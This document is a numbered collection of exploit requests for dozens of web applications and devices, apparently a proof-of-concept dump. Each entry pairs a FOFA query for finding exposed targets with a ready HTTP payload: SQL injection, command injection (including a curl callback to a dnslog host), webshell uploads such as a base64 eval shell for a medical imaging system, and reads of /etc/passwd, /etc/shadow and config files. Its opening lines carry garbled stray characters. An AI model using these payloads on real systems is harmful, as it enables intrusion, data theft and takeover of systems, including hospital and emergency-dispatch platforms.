1 M8 _8 R& S9 N) }) J* mGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
3 y# _- {& z# uHost: x.x.x.x
# u' p1 L0 \6 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! x) Z3 M4 ^% a, `. |) v* X+ {5 Y3 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& U" v2 ?0 e5 ]) P2 Z- t# rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& T9 p6 e: m, b3 ]1 AAccept-Encoding: gzip, deflate, br' k* R& \# A+ I2 t; B
Connection: close4 i) }) [& Q) i8 Q. \7 J. Z
Cookie: authcode=h8g9; }0 h6 Q: R  V. Y- L) @* }& U
Upgrade-Insecure-Requests: 1
- i, x, g/ X+ F$ }& q% _% f  e1 ~! Q& E  W8 W9 c

" u& j- N2 k; m, q# t. d7 i141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% w% ~8 E; @8 s0 X" t" u# W% y9 }
FOFA:body="指挥调度管理平台"
) g: {! x; D, U& C( Z, O7 S( ]POST /app/ext/ajax_users.php HTTP/1.1% }; x, W: O/ d) K! ]4 h
Host: your-ip( Y) Z" C! ?3 U8 c- L; b7 q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
* Y# r2 S2 y1 bContent-Type: application/x-www-form-urlencoded, s3 }( d- g6 @* d1 s

, k5 k" J: k) j; L! k( @( w$ A( z6 Y
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- N# R: q; i( v: g

5 J5 h$ X9 i& ?3 s
142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10051
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 PACS (medical imaging archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
